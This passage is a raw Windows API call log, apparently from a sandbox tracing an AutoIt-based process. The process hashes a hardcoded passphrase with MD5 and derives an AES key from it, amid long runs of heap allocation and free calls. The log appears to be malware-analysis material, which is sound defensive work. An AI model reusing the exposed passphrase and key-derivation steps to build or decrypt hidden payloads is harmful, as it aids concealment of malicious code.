RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796e28 [0125.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.270] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0125.272] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0125.272] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.272] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0125.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0125.273] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0125.273] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0125.273] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0125.273] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0125.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.274] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.274] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0125.275] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.275] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca988, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0125.275] CryptHashData (hHash=0x41ac200, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0125.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.275] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0125.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0125.275] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac2c0) returned 1 [0125.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0125.276] CryptDestroyHash (hHash=0x41ac200) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0125.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.277] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: 